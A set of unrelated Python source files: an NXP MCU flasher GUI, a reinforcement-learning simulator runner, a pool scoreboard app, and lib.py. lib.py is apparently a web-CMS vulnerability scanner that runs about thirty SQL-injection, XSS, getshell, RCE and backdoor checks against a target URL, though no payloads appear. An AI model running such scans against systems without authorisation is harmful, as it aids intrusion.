self.updateSlotStatus(deviceIndex, 'gray', g_usbAutoDownloadResult_success[deviceIndex], g_usbAutoDownloadResult_total[deviceIndex])
def callbackAllInOneAction( self, event ):
if self.isUartPortSelected:
self.isUartAllInOneActionTaskPending[0] = True
self._startGaugeTimer()
elif self.isUsbhidPortSelected and (not self.isDymaticUsbDetection):
self.isUsbAllInOneActionTaskPending[0] = True
self._startGaugeTimer()
else:
pass
def _resetAllSlots( self ):
if self.isUartPortSelected:
autoDownloadResult_success = g_uartAutoDownloadResult_success
autoDownloadResult_total = g_uartAutoDownloadResult_total
elif self.isUsbhidPortSelected:
autoDownloadResult_success = g_usbAutoDownloadResult_success
autoDownloadResult_total = g_usbAutoDownloadResult_total
else:
pass
for i in range(uidef.kMaxMfgBoards):
autoDownloadResult_success[i] = 0
autoDownloadResult_total[i] = 0
self.updateSlotStatus(i, 'gray', autoDownloadResult_success[i], autoDownloadResult_total[i])
def _triggerAllUsbDevicesOnce( self ):
if self.isUsbhidPortSelected and self.isDymaticUsbDetection:
for i in range(uidef.kMaxMfgBoards):
if self.usbDevicePath[i]['rom'] != None:
self.isUsbAllInOneActionTaskPending[i] = True
else:
pass
else:
pass
def callbackChangedAppFile( self, event ):
self.getUserAppFilePath()
self.setCostTime(0)
self.setDownloadOperationResults(0)
self.updateConnectStatus('black')
self._resetAllSlots()
#self._triggerAllUsbDevicesOnce()
def callbackChangedAppFolder( self, event ):
self.getUserAppFilePath()
if os.path.isfile(self.sbAppFilePath):
self.resetUserAppFolderPath()
self.setInfoStatus(uilang.kMsgLanguageContentDict['downloadError_clearImageFileFirst'][self.languageIndex])
else:
self.getUserAppFolderPath()
self.setCostTime(0)
self.setDownloadOperationResults(0)
self.updateConnectStatus('black')
self._resetAllSlots()
#self._triggerAllUsbDevicesOnce()
def _stopTask( self, thread ):
_async_raise(thread.ident, SystemExit)
def _deinitToolToExit( self ):
self._stopTask(g_task_detectUsbhid)
self._stopTask(g_task_uartAllInOneAction[0])
self._stopTask(g_task_usbAllInOneAction[0])
self._stopTask(g_task_increaseGauge)
global g_main_win
g_main_win.Show(False)
try:
self.Destroy()
except:
pass
self.closeInfoLog()
self.closeDebugLog()
def callbackExit( self, event ):
self._deinitToolToExit()
def callbackClose( self, event ):
self._deinitToolToExit()
def callbackSetUsbDetectionAsDynamic( self, event ):
self.setUsbDetection()
def callbackSetUsbDetectionAsStatic( self, event ):
self.setUsbDetection()
def callbackSetLanguageAsEnglish( self, event ):
self.setLanguage()
def callbackSetLanguageAsChinese( self, event ):
self.setLanguage()
def callbackShowHomePage( self, event ):
msgText = ((uilang.kMsgLanguageContentDict['homePage_info'][self.languageIndex]))
wx.MessageBox(msgText, uilang.kMsgLanguageContentDict['homePage_title'][self.languageIndex], wx.OK | wx.ICON_INFORMATION)
def callbackShowAboutAuthor( self, event ):
msgText = ((uilang.kMsgLanguageContentDict['aboutAuthor_author'][self.languageIndex]) +
(uilang.kMsgLanguageContentDict['aboutAuthor_email1'][self.languageIndex]) +
(uilang.kMsgLanguageContentDict['aboutAuthor_email2'][self.languageIndex]) +
(uilang.kMsgLanguageContentDict['aboutAuthor_blog'][self.languageIndex]))
wx.MessageBox(msgText, uilang.kMsgLanguageContentDict['aboutAuthor_title'][self.languageIndex], wx.OK | wx.ICON_INFORMATION)
def callbackShowRevisionHistory( self, event ):
msgText = ((uilang.kMsgLanguageContentDict['revisionHistory_v1_0_0'][self.languageIndex]) +
(uilang.kMsgLanguageContentDict['revisionHistory_v2_0_0'][self.languageIndex]) +
(uilang.kMsgLanguageContentDict['revisionHistory_v3_0_0'][self.languageIndex]) +
(uilang.kMsgLanguageContentDict['revisionHistory_v3_1_0'][self.languageIndex]) +
(uilang.kMsgLanguageContentDict['revisionHistory_v3_2_0'][self.languageIndex]))
wx.MessageBox(msgText, uilang.kMsgLanguageContentDict['revisionHistory_title'][self.languageIndex], wx.OK | wx.ICON_INFORMATION)
if __name__ == '__main__':
app = wx.App()
g_main_win = flashMain(None)
g_main_win.SetTitle(u"NXP MCU Boot Flasher v3.2.0")
g_main_win.Show()
g_task_detectUsbhid = threading.Thread(target=g_main_win.task_doDetectUsbhid)
g_task_detectUsbhid.setDaemon(True)
g_task_detectUsbhid.start()
g_task_uartAllInOneAction[0] = threading.Thread(target=g_main_win.task_doUart0AllInOneAction)
g_task_uartAllInOneAction[0].setDaemon(True)
g_task_uartAllInOneAction[0].start()
g_task_uartAllInOneAction[1] = threading.Thread(target=g_main_win.task_doUart1AllInOneAction)
g_task_uartAllInOneAction[1].setDaemon(True)
g_task_uartAllInOneAction[1].start()
g_task_uartAllInOneAction[2] = threading.Thread(target=g_main_win.task_doUart2AllInOneAction)
g_task_uartAllInOneAction[2].setDaemon(True)
g_task_uartAllInOneAction[2].start()
g_task_uartAllInOneAction[3] = threading.Thread(target=g_main_win.task_doUart3AllInOneAction)
g_task_uartAllInOneAction[3].setDaemon(True)
g_task_uartAllInOneAction[3].start()
g_task_uartAllInOneAction[4] = threading.Thread(target=g_main_win.task_doUart4AllInOneAction)
g_task_uartAllInOneAction[4].setDaemon(True)
g_task_uartAllInOneAction[4].start()
g_task_uartAllInOneAction[5] = threading.Thread(target=g_main_win.task_doUart5AllInOneAction)
g_task_uartAllInOneAction[5].setDaemon(True)
g_task_uartAllInOneAction[5].start()
g_task_uartAllInOneAction[6] = threading.Thread(target=g_main_win.task_doUart6AllInOneAction)
g_task_uartAllInOneAction[6].setDaemon(True)
g_task_uartAllInOneAction[6].start()
g_task_uartAllInOneAction[7] = threading.Thread(target=g_main_win.task_doUart7AllInOneAction)
g_task_uartAllInOneAction[7].setDaemon(True)
g_task_uartAllInOneAction[7].start()
g_task_usbAllInOneAction[0] = threading.Thread(target=g_main_win.task_doUsb0AllInOneAction)
g_task_usbAllInOneAction[0].setDaemon(True)
g_task_usbAllInOneAction[0].start()
g_task_usbAllInOneAction[1] = threading.Thread(target=g_main_win.task_doUsb1AllInOneAction)
g_task_usbAllInOneAction[1].setDaemon(True)
g_task_usbAllInOneAction[1].start()
g_task_usbAllInOneAction[2] = threading.Thread(target=g_main_win.task_doUsb2AllInOneAction)
g_task_usbAllInOneAction[2].setDaemon(True)
g_task_usbAllInOneAction[2].start()
g_task_usbAllInOneAction[3] = threading.Thread(target=g_main_win.task_doUsb3AllInOneAction)
g_task_usbAllInOneAction[3].setDaemon(True)
g_task_usbAllInOneAction[3].start()
g_task_usbAllInOneAction[4] = threading.Thread(target=g_main_win.task_doUsb4AllInOneAction)
g_task_usbAllInOneAction[4].setDaemon(True)
g_task_usbAllInOneAction[4].start()
g_task_usbAllInOneAction[5] = threading.Thread(target=g_main_win.task_doUsb5AllInOneAction)
g_task_usbAllInOneAction[5].setDaemon(True)
g_task_usbAllInOneAction[5].start()
g_task_usbAllInOneAction[6] = threading.Thread(target=g_main_win.task_doUsb6AllInOneAction)
g_task_usbAllInOneAction[6].setDaemon(True)
g_task_usbAllInOneAction[6].start()
g_task_usbAllInOneAction[7] = threading.Thread(target=g_main_win.task_doUsb7AllInOneAction)
g_task_usbAllInOneAction[7].setDaemon(True)
g_task_usbAllInOneAction[7].start()
g_task_increaseGauge = threading.Thread(target=g_main_win.task_doIncreaseGauge)
g_task_increaseGauge.setDaemon(True)
g_task_increaseGauge.start()
app.MainLoop()
|
mevea_runner.py
|
import numpy as np
import gym, pyautogui, cv2, os, shutil
import os.path as osp
from common.runners import AbstractEnvRunner, swap_and_flatten
from common.solver_utils import get_solver_path, start_solver, stop_solver
from common.server_utils import is_backend_registered, delete_id
from time import sleep, time
from threading import Thread
class MeveaRunner(AbstractEnvRunner):
def __init__(self, *, env, model, n_steps, gamma, lam, debug=False):
"""
A runner to learn the policy of an environment for a model
:param env: (Gym environment) The environment to learn from
:param model: (Model) The model to learn
:param n_steps: (int) The number of steps to run for each environment
:param gamma: (float) Discount factor
:param lam: (float) Factor for trade-off of bias vs variance for Generalized Advantage Estimator
"""
super().__init__(env=env, model=model, n_steps=n_steps)
self.lam = lam
self.gamma = gamma
self.solver_path = get_solver_path()
self.mvs = env.mvs
self.dir = env.dir
self.server = env.server
self.recording = False
self.debug = debug
self.is_solver_starting = False
# copy model to different directories to deal with data.tmp bug
if len(self.mvs) == 1:
self.model_dirs = self.mvs
else:
self.model_dirs = []
for i, mvs in enumerate(self.mvs):
basename = []
for j in range(3):
basename.append(osp.basename(mvs))
mvs = osp.dirname(mvs)
env_i_dir = osp.join(self.dir[i], str(i))
if not osp.isdir(env_i_dir):
shutil.copytree(mvs, env_i_dir)
self.model_dirs.append(osp.abspath(osp.join(env_i_dir, *basename[::-1])))
# reset environments in debug mode
if self.debug:
inp = input('id:\n')
self.backend_ids = [int(item) for item in inp.split(',')]
# init data
self.mb_obs = [[] for _ in range(self.n_envs)]
self.mb_actions = [[] for _ in range(self.n_envs)]
self.mb_values = [[] for _ in range(self.n_envs)]
self.mb_neglogpacs = [[] for _ in range(self.n_envs)]
self.mb_dones = [[] for _ in range(self.n_envs)]
self.mb_rewards = [[] for _ in range(self.n_envs)]
self.scores = [[] for _ in range(self.n_envs)]
def _start(self, headless=False, sleep_interval=1):
self.backend_procs = []
self.start_times = []
self.is_solver_starting = True
for mvs, server in zip(self.model_dirs, self.server):
proc = start_solver(self.solver_path, mvs, headless=headless)
self.backend_procs.append(proc)
while not is_backend_registered(server, proc.pid):
sleep(sleep_interval)
self.start_times.append(time())
self.is_solver_starting = False
def record(self, video_file, sleep_interval=0.25, x=210, y=90, width=755, height=400):
screen_size = pyautogui.Size(width, height)
fourcc = cv2.VideoWriter_fourcc(*"MP4V")
out = cv2.VideoWriter(video_file, fourcc, 20.0, (screen_size))
while self.recording:
img = pyautogui.screenshot(region=(x, y, width, height))
frame = np.array(img)
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
out.write(frame)
sleep(sleep_interval)
cv2.destroyAllWindows()
out.release()
def _stop(self):
for proc, server in zip(self.backend_procs, self.server):
stop_solver(proc)
delete_id(server, proc.pid)
def _run_all(self, video_file=None, headless=True):
"""
Run a learning step of the model
:return:
- observations: (np.ndarray) the observations
- rewards: (np.ndarray) the rewards
- masks: (numpy bool) whether an episode is over or not
- actions: (np.ndarray) the actions
- values: (np.ndarray) the value function output
- negative log probabilities: (np.ndarray)
- states: (np.ndarray) the internal states of the recurrent policies
- infos: (dict) the extra information of the model
"""
# mb stands for minibatch
# start environment right here
self._start(headless=headless)
self.env.set_attr('id', [proc.pid for proc in self.backend_procs])
#self.obs[:] = self.env.reset()
if video_file is not None:
self.recording = True
thr = Thread(target=self.record, args=(video_file,), daemon=True)
thr.start()
mb_obs, mb_rewards, mb_actions, mb_values, mb_dones, mb_neglogpacs = [], [], [], [], [], []
mb_states = self.states
ep_infos = []
scores = [[] for _ in range(self.n_envs)]
scores_1 = [[] for _ in range(self.n_envs)]
scores_2 = [[] for _ in range(self.n_envs)]
scores_3 = [[] for _ in range(self.n_envs)]
tstep = 0
for _ in range(self.n_steps):
tstart = time()
actions, values, self.states, neglogpacs = self.model.step(self.obs, self.states, self.dones)
mb_obs.append(self.obs.copy())
mb_actions.append(actions)
mb_values.append(values)
mb_neglogpacs.append(neglogpacs)
mb_dones.append(self.dones)
clipped_actions = actions
# Clip the actions to avoid out of bound error
if isinstance(self.env.action_space, gym.spaces.Box):
clipped_actions = np.clip(actions, self.env.action_space.low, self.env.action_space.high)
self.obs[:], rewards, self.dones, infos = self.env.step(clipped_actions)
for ri, r in enumerate(rewards):
scores[ri].append(r)
for ri, inf in enumerate(infos):
scores_1[ri].append(infos[ri]['rc1'])
scores_2[ri].append(infos[ri]['rc2'])
scores_3[ri].append(infos[ri]['rc3'])
self.model.num_timesteps += self.n_envs
if self.callback is not None:
# Abort training early
self.callback.update_locals(locals())
if self.callback.on_step() is False:
self.continue_training = False
# Return dummy values
return [None] * 9
mb_rewards.append(rewards)
tstep += (time() - tstart)
print('Step time: {0}'.format(tstep / self.n_steps))
# stop recording
self.recording = False
# stop backends
self._stop()
# gather info
for escore, escore1, escore2, escore3 in zip(scores, scores_1, scores_2, scores_3):
maybe_ep_info = {'r': np.mean(escore), 'rc1': np.mean(escore1), 'rc2': np.mean(escore2), 'rc3': np.mean(escore3)}
if maybe_ep_info is not None:
ep_infos.append(maybe_ep_info)
# batch of steps to batch of rollouts
mb_obs = np.asarray(mb_obs, dtype=self.obs.dtype)
mb_rewards = np.asarray(mb_rewards, dtype=np.float32)
mb_actions = np.asarray(mb_actions)
mb_values = np.asarray(mb_values, dtype=np.float32)
mb_neglogpacs = np.asarray(mb_neglogpacs, dtype=np.float32)
mb_dones = np.asarray(mb_dones, dtype=np.bool)
last_values = self.model.value(self.obs, self.states, self.dones)
# discount/bootstrap off value fn
mb_advs = np.zeros_like(mb_rewards)
true_reward = np.copy(mb_rewards)
last_gae_lam = 0
for step in reversed(range(self.n_steps)):
if step == self.n_steps - 1:
nextnonterminal = 1.0 - self.dones
nextvalues = last_values
else:
nextnonterminal = 1.0 - mb_dones[step + 1]
nextvalues = mb_values[step + 1]
delta = mb_rewards[step] + self.gamma * nextvalues * nextnonterminal - mb_values[step]
mb_advs[step] = last_gae_lam = delta + self.gamma * self.lam * nextnonterminal * last_gae_lam
mb_returns = mb_advs + mb_values
mb_obs, mb_returns, mb_dones, mb_actions, mb_values, mb_neglogpacs, true_reward = \
map(swap_and_flatten, (mb_obs, mb_returns, mb_dones, mb_actions, mb_values, mb_neglogpacs, true_reward))
return mb_obs, mb_returns, mb_dones, mb_actions, mb_values, mb_neglogpacs, mb_states, ep_infos, true_reward
def _run_one(self, env_idx, headless, sleep_interval=1, delay_interval=2):
# sleep to prevent pressure bug
sleep(delay_interval)
# start timer
tstart = time()
# reset env
if self.debug:
print(f'Reseting {env_idx}')
print(f'In {env_idx}, time between register and reset: {time() - self.start_times[env_idx]}')
self.obs[env_idx:env_idx+1] = self.env.reset_one(env_idx)
if self.debug:
print(f'Solver {env_idx} has been reset')
for _ in range(self.n_steps):
if self.debug:
print(_)
# step model
actions, values, self.states, neglogpacs = self.model.step(self.obs[env_idx:env_idx+1], self.states, self.dones[env_idx:env_idx+1])
# save results
self.mb_obs[env_idx].append(self.obs.copy()[env_idx])
self.mb_actions[env_idx].append(actions[0])
self.mb_values[env_idx].append(values[0])
self.mb_neglogpacs[env_idx].append(neglogpacs[0])
self.mb_dones[env_idx].append(self.dones[env_idx])
# Clip the actions to avoid out of bound error
clipped_actions = actions
if isinstance(self.env.action_space, gym.spaces.Box):
clipped_actions = np.clip(actions, self.env.action_space.low, self.env.action_space.high)
tnow = time()
self.obs[env_idx], rewards, self.dones[env_idx], infos = self.env.step_one(env_idx, clipped_actions)
# reset if done
if self.dones[env_idx]:
print(f'Env {env_idx} is done')
stop_solver(self.backend_procs[env_idx])
delete_id(self.server[env_idx], self.backend_procs[env_idx].pid)
while self.is_solver_starting:
sleep(sleep_interval)
self.is_solver_starting = True
proc = start_solver(self.solver_path, self.model_dirs[env_idx], headless=headless)
self.backend_procs[env_idx] = proc
while not is_backend_registered(self.server[env_idx], proc.pid):
sleep(sleep_interval)
self.start_times[env_idx] = time()
self.is_solver_starting = False
sleep(delay_interval)
self.env.set_attr('id', [proc.pid], indices=[env_idx])
if self.debug:
print(f'In {env_idx}, time between register and reset: {time() - self.start_times[env_idx]}')
self.obs[env_idx:env_idx + 1] = self.env.reset_one(env_idx)
if self.debug:
print('Env', env_idx, 'step takes', time() - tnow, 'seconds')
self.scores[env_idx].append([rewards, infos['rc1'], infos['rc2'], infos['rc3']])
self.model.num_timesteps += 1
if self.callback is not None:
# Abort training early
self.callback.update_locals(locals())
if self.callback.on_step() is False:
self.continue_training = False
# Return dummy values
return [None] * 9
self.mb_rewards[env_idx].append(rewards)
print(f'Step time in {self.backend_procs[env_idx].pid}: {(time() - tstart) / self.n_steps}')
stop_solver(self.backend_procs[env_idx])
delete_id(self.server[env_idx], self.backend_procs[env_idx].pid)
def _run(self, video_file=None, headless=False):
"""
Run a learning step of the model
:return:
- observations: (np.ndarray) the observations
- rewards: (np.ndarray) the rewards
- masks: (numpy bool) whether an episode is over or not
- actions: (np.ndarray) the actions
- values: (np.ndarray) the value function output
- negative log probabilities: (np.ndarray)
- states: (np.ndarray) the internal states of the recurrent policies
- infos: (dict) the extra information of the model
"""
# mb stands for minibatch
self.mb_obs = [[] for _ in range(self.n_envs)]
self.mb_actions = [[] for _ in range(self.n_envs)]
self.mb_values = [[] for _ in range(self.n_envs)]
self.mb_neglogpacs = [[] for _ in range(self.n_envs)]
self.mb_dones = [[] for _ in range(self.n_envs)]
self.mb_rewards = [[] for _ in range(self.n_envs)]
ep_infos = []
# start environment's backend
if self.debug:
self.env.set_attr('id', self.backend_ids)
else:
self._start(headless=headless)
self.env.set_attr('id', [proc.pid for proc in self.backend_procs])
# reset environment's frontend
#self.obs[:] = self.env.reset()
# start video recording
if video_file is not None:
self.recording = True
thr = Thread(target=self.record, args=(video_file,), daemon=True)
thr.start()
# run steps in different threads
threads = []
for env_idx in range(self.n_envs):
th = Thread(target=self._run_one, args=(env_idx, headless))
th.start()
threads.append(th)
for th in threads:
th.join()
# stop recording
self.recording = False
# combine data gathered into batches
mb_obs = [np.vstack([self.mb_obs[idx][step] for idx in range(self.n_envs)]) for step in range(self.n_steps)]
mb_rewards = [np.hstack([self.mb_rewards[idx][step] for idx in range(self.n_envs)]) for step in range(self.n_steps)]
mb_actions = [np.vstack([self.mb_actions[idx][step] for idx in range(self.n_envs)]) for step in range(self.n_steps)]
mb_values = [np.hstack([self.mb_values[idx][step] for idx in range(self.n_envs)]) for step in range(self.n_steps)]
mb_neglogpacs = [np.hstack([self.mb_neglogpacs[idx][step] for idx in range(self.n_envs)]) for step in range(self.n_steps)]
mb_dones = [np.hstack([self.mb_dones[idx][step] for idx in range(self.n_envs)]) for step in range(self.n_steps)]
mb_scores = [np.vstack([self.scores[idx][step] for idx in range(self.n_envs)]) for step in range(self.n_steps)]
mb_states = self.states
self.dones = np.array(self.dones)
infos = np.mean(np.array(mb_scores), axis=0)
for info in infos:
maybe_ep_info = {
'r': info[0],
'rc1': info[1],
'rc2': info[2],
'rc3': info[3]
}
ep_infos.append(maybe_ep_info)
# batch of steps to batch of rollouts
mb_obs = np.asarray(mb_obs, dtype=self.obs.dtype)
mb_rewards = np.asarray(mb_rewards, dtype=np.float32)
mb_actions = np.asarray(mb_actions)
mb_values = np.asarray(mb_values, dtype=np.float32)
mb_neglogpacs = np.asarray(mb_neglogpacs, dtype=np.float32)
mb_dones = np.asarray(mb_dones, dtype=np.bool)
last_values = self.model.value(self.obs, self.states, self.dones)
# discount/bootstrap off value fn
mb_advs = np.zeros_like(mb_rewards)
true_reward = np.copy(mb_rewards)
last_gae_lam = 0
for step in reversed(range(self.n_steps)):
if step == self.n_steps - 1:
nextnonterminal = 1.0 - self.dones
nextvalues = last_values
else:
nextnonterminal = 1.0 - mb_dones[step + 1]
nextvalues = mb_values[step + 1]
delta = mb_rewards[step] + self.gamma * nextvalues * nextnonterminal - mb_values[step]
mb_advs[step] = last_gae_lam = delta + self.gamma * self.lam * nextnonterminal * last_gae_lam
mb_returns = mb_advs + mb_values
mb_obs, mb_returns, mb_dones, mb_actions, mb_values, mb_neglogpacs, true_reward = \
map(swap_and_flatten, (mb_obs, mb_returns, mb_dones, mb_actions, mb_values, mb_neglogpacs, true_reward))
# reset data
self.mb_obs = [[] for _ in range(self.n_envs)]
self.mb_actions = [[] for _ in range(self.n_envs)]
self.mb_values = [[] for _ in range(self.n_envs)]
self.mb_neglogpacs = [[] for _ in range(self.n_envs)]
self.mb_dones = [[] for _ in range(self.n_envs)]
self.mb_rewards = [[] for _ in range(self.n_envs)]
self.scores = [[] for _ in range(self.n_envs)]
return mb_obs, mb_returns, mb_dones, mb_actions, mb_values, mb_neglogpacs, mb_states, ep_infos, true_reward
|
lib.py
|
from termcolor import cprint
import threading
from info.GetVersion import GetVersion
from info.FindAdmin import FindAdmin
from info.trace import trace
from info.shortpath import shortpath
from info.passwordrest import passwordres
from info.path import path
from script.advancedsearch_sqli import advancedsearch_sqli
from script.dedesql_class_sqli import dedesql_class_sqli
from script.feedback_js_sqli import feedback_sqli
from script.getpage_xss import getpage_xss
from script.guestbook_sqli import guestbook_sqli
from script.infosearch_sqli import infosearch_sqli
from script.jump_xss import jump_xss
from script.mem_login_xss import jump_xss
from script.recommend_sqli import recomsqli
from script.redirect import redirect
from script.reg_new_sqli import reg_new_sqli
from script.search_sqli import search_sqli
from script.V5orderby import V5orderby
from script.v5xarticlekeywordsselectxss import article_xss
from script.v5xcatalogtreexss import catalogtree_xss
from script.v5xcontentlistxss import content_list_xss
from script.v5xfilepicview import file_pic_vie_xss
from script.v5xpicviewxss import pic_view_xss
from script.v5xselectimages import select_images_xss
from script.v51WriteBookTextgetshell import writebook_getshell
from script.v53diggframerce import dig_frame_rce
from script.v55finalgetshell import final_getshell
from script.v55keywordxss import keyword_xss
from script.v56gourlxss import gourl_xss
from script.v57adminxss import config_xss
from script.v57backdoor import backdoor
from script.v57flashxss import flash_xss
class check:
def __init__(self,url):
self.url = url
def poc(self):
url = self.url
cprint("Version checking in progress","magenta")
dd = GetVersion(url=url)
t = threading.Thread(target=dd.version())
t.setDaemon(True)
t.start()
t.join()
cprint("find admin in progress","magenta")
dd = FindAdmin(url=url)
t = threading.Thread(target=dd.findadmin())
t.setDaemon(True)
t.start()
t.join()
cprint("trace checking in progress","magenta")
dd = trace(url=url)
t = threading.Thread(target=dd.checktrace())
t.setDaemon(True)
t.start()
t.join()
cprint("shortpath checking in progress","magenta")
dd = shortpath(url=url)
t = threading.Thread(target=dd.shortpath())
t.setDaemon(True)
t.start()
t.join()
cprint("password reset checking in progress","magenta")
dd = passwordres(url=url)
t = threading.Thread(target=dd.checkpass())
t.setDaemon(True)
t.start()
t.join()
cprint("path checking in progress","magenta")
dd = path(url=url)
t = threading.Thread(target=dd.checkpath())
t.setDaemon(True)
t.start()
t.join()
cprint("advancedsearch_sqli checking in progress","magenta")
dd = advancedsearch_sqli(url=url)
t = threading.Thread(target=dd.checktrace())
t.setDaemon(True)
t.start()
t.join()
cprint("dedesql_class_sqli checking in progress","magenta")
dd = dedesql_class_sqli(url=url)
t = threading.Thread(target=dd.checkdedesql())
t.setDaemon(True)
t.start()
t.join()
cprint("feedback_js_sqli checking in progress","magenta")
dd = feedback_sqli(url=url)
t = threading.Thread(target=dd.feedcheck())
t.setDaemon(True)
t.start()
t.join()
cprint("getpage_xss checking in progress","magenta")
dd = getpage_xss(url=url)
t = threading.Thread(target=dd.checktrace())
t.setDaemon(True)
t.start()
t.join()
cprint("guestbook_sqli checking in progress","magenta")
dd = guestbook_sqli(url=url)
t = threading.Thread(target=dd.checksql())
t.setDaemon(True)
t.start()
t.join()
cprint("infosearch_sqli checking in progress","magenta")
dd = infosearch_sqli(url=url)
t = threading.Thread(target=dd.checktrace())
t.setDaemon(True)
t.start()
t.join()
cprint("jump_xss checking in progress","magenta")
dd = jump_xss(url=url)
t = threading.Thread(target=dd.checktrace())
t.setDaemon(True)
t.start()
t.join()
cprint("recommend_sqli checking in progress","magenta")
dd = recomsqli(url=url)
t = threading.Thread(target=dd.checksql())
t.setDaemon(True)
t.start()
t.join()
cprint("redirect checking in progress","magenta")
dd = redirect(url=url)
t = threading.Thread(target=dd.check_redirect())
t.setDaemon(True)
t.start()
t.join()
cprint("reg_new_sqli checking in progress","magenta")
dd = reg_new_sqli(url=url)
t = threading.Thread(target=dd.checksql())
t.setDaemon(True)
t.start()
t.join()
cprint("search_sqli checking in progress","magenta")
dd = search_sqli(url=url)
t = threading.Thread(target=dd.checksqli())
t.setDaemon(True)
t.start()
t.join()
cprint("V5orderby checking in progress","magenta")
dd = V5orderby(url=url)
t = threading.Thread(target=dd.checksql())
t.setDaemon(True)
t.start()
t.join()
cprint("v5xarticlekeywordsselectxss checking in progress","magenta")
dd = article_xss(url=url)
t = threading.Thread(target=dd.checktxss())
t.setDaemon(True)
t.start()
t.join()
cprint("v5xcatalogtreexss checking in progress","magenta")
dd = catalogtree_xss(url=url)
t = threading.Thread(target=dd.checktrace())
t.setDaemon(True)
t.start()
t.join()
cprint("v5xcontentlistxss checking in progress","magenta")
dd = content_list_xss(url=url)
t = threading.Thread(target=dd.checktrace())
t.setDaemon(True)
t.start()
t.join()
cprint("v5xfilepicview checking in progress","magenta")
dd = file_pic_vie_xss(url=url)
t = threading.Thread(target=dd.checktrace())
t.setDaemon(True)
t.start()
t.join()
cprint("v5xpicviewxss checking in progress","magenta")
dd = pic_view_xss(url=url)
t = threading.Thread(target=dd.checktrace())
t.setDaemon(True)
t.start()
t.join()
cprint("v5xselectimages checking in progress","magenta")
dd = select_images_xss(url=url)
t = threading.Thread(target=dd.checktrace())
t.setDaemon(True)
t.start()
t.join()
cprint("v51WriteBookTextgetshell checking in progress","magenta")
dd = writebook_getshell(url=url)
t = threading.Thread(target=dd.checktrace())
t.setDaemon(True)
t.start()
t.join()
cprint("v53diggframerce checking in progress","magenta")
dd = dig_frame_rce(url=url)
t = threading.Thread(target=dd.checktrace())
t.setDaemon(True)
t.start()
t.join()
cprint("v55finalgetshell checking in progress","magenta")
dd = final_getshell(url=url)
t = threading.Thread(target=dd.checktrace())
t.setDaemon(True)
t.start()
t.join()
cprint("v55keywordxss checking in progress","magenta")
dd = keyword_xss(url=url)
t = threading.Thread(target=dd.checktrace())
t.setDaemon(True)
t.start()
t.join()
cprint("v56gourlxss checking in progress","magenta")
dd = gourl_xss(url=url)
t = threading.Thread(target=dd.checktrace())
t.setDaemon(True)
t.start()
t.join()
cprint("v57adminxss checking in progress","magenta")
dd = config_xss(url=url)
t = threading.Thread(target=dd.checktrace())
t.setDaemon(True)
t.start()
t.join()
cprint("v57backdoor checking in progress","magenta")
dd = backdoor(url=url)
t = threading.Thread(target=dd.checktrace())
t.setDaemon(True)
t.start()
t.join()
cprint("v57flashxss checking in progress","magenta")
dd = flash_xss(url=url)
t = threading.Thread(target=dd.checktrace())
t.setDaemon(True)
t.start()
t.join()
|
SCOREBOARD_WITH_SETTING_PAGE.py
|
# This my first app done using REMI and Python. Probably there is a better way to do it.
# This app is a simple scoreboard. I use it when I play pool/biliard.
# In the app is possible set-up how many Games one has to win, to win a Match.
# Example: the program starts with 5 games to win for a match. The background color of the window of each player is normally green, when one player arrives
# to 4 games won his background becomes orange (it's a sign that he needs only one more game to win the match). When you arrive to 5 your background
# becomes red for 3 seconds and then it goes back to green, the games score goes back to 0 and your "matches won" increase of one.
import remi.gui as gui
from remi import start, App
import os
import time
import threading
class MyApp(App):
# I modified the original CSS file adding a "Button:hover" property and other color schemes; the main configuraton of the program has been done directly in the code.
# Add the new CSS file in a /RES folder.
def __init__(self, *args):
res_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'res')
super(MyApp, self).__init__(*args, static_file_path={'res':res_path})
def idle(self):
pass
# This is the function called as a new thread that updates the Number displayed, change the background color to red for 3 seconds, reset the game variables,
# change the background color back to green.
def ChangeColor(self, Text, Side, Num, BtUp, BtDn):
self.In = 1
with self.update_lock:
Text.set_text(str(Num))
Side.style['background-color'] = 'red'
BtUp.attributes['class']='up80red'
BtDn.attributes['class']='dn80red'
time.sleep(3) # I tried to make this function without use the thread but the "sleep" here frozen the interface update and I wasn't able to change
# the background to red. Remi's guys helped me to solve this.
with self.update_lock:
Side.style['background-color'] = 'green'
BtUp.attributes['class']='up80'
BtDn.attributes['class']='dn80'
self.LeftNum = 0
self.RightNum = 0
self.In = 0
self.check_score()
def main(self):
self.In = 0 # Used to disable all buttons when in thread function, otherwise strange things happen if you press a button when the app is in the thread
self.LeftNum = 0 # Left player game won
self.RightNum = 0 # Right player game won
self.MatchNum = 5 # Number of game to win for each match
self.LeftMatchNum = 0 # Left player match won
self.RightMatchNum = 0 # Right player match won
self.Name1 = 'LEFT' # Name left player
self.Name2 = 'RIGHT' # Name right player
# Main container configuration page
widMenu = gui.Widget(width=480, height=610, layout_orientation=gui.Widget.LAYOUT_VERTICAL, style={'margin':'0px auto', 'background':'black'})
# Configuration menu
self.lblMenu = gui.Label('SCOREBOARD', width='100%', height='45px', style={'margin':'0px 0px 0px', 'padding-top':'10px', 'font-size':'40px', 'font-weight':'bold', 'color':'green', 'line-height':'45px', 'text-align':'center'})
self.lblMenu2 = gui.Label('Setup players name:', width='100%', height='45px', style={'margin':'0px 0px 0px', 'padding-top':'10px', 'font-size':'30px', 'font-weight':'bold', 'line-height':'45px', 'text-align':'left'})
self.lblName1 = gui.Label('PLAYER 1 NAME:', width='100%', height='35px', style={'margin':'0px 0px 0px', 'padding-top':'20px', 'font-size':'20px', 'line-height':'25px', 'text-align':'left'})
self.txtName1 = gui.TextInput(width='96%', height='35px', style={'margin':'0px auto', 'padding-top':'20px', 'padding-left':'5px', 'font-size':'30px', 'line-height':'20px', 'text-align':'left', 'border':'1px solid white', 'background':'black'})
self.txtName1.set_text('P1')
self.lblName2 = gui.Label('PLAYER 2 NAME:', width='100%', height='35px', style={'margin':'0px 0px 0px', 'padding-top':'20px', 'font-size':'20px', 'line-height':'25px', 'text-align':'left'})
self.txtName2 = gui.TextInput(width='96%', height='35px', style={'margin':'0px auto', 'padding-top':'20px', 'padding-left':'5px', 'font-size':'30px', 'line-height':'20px', 'text-align':'left', 'border':'1px solid white', 'background':'black'})
self.txtName2.set_text('P2')
## self.lblMatchSet = gui.Label('RACE TO:', width='100%', height='35px', style={'margin':'0px 0px 0px', 'padding-top':'20px', 'font-size':'20px', 'line-height':'25px', 'text-align':'left'})
